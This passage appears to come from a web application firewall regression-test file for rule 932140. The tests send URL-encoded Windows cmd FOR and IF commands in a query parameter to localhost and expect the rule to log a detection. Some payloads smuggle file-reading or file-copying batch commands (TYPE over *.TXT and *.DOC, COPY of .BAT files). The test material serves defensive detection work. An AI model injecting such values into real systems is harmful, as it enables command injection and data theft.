- port: 80
- uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-58
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-59
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-60
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-61
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-62
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-63
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-64
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-65
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-66
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-67
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-68
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-69
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found."
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-70
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-71
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-72
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-73
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-74
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-75
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-76
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-77
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-78
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-79
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-80
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-81
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-82
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-83
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-84
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-85
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-86
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-87
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-88
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-89
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-90
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-91
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-92
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-93
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-94
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-95
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-96
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-97
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-98
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-99
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-100
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-101
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-102
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-103
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-104
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+not+%282+equ+2%29+echo+hey"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-105
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-106
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-107
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-108
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-109
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-110
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-111
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-112
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-113
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-114
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-115
- desc: imported test
- stages:
- - stage:
- 
input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-116 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-117 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-118 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..." 
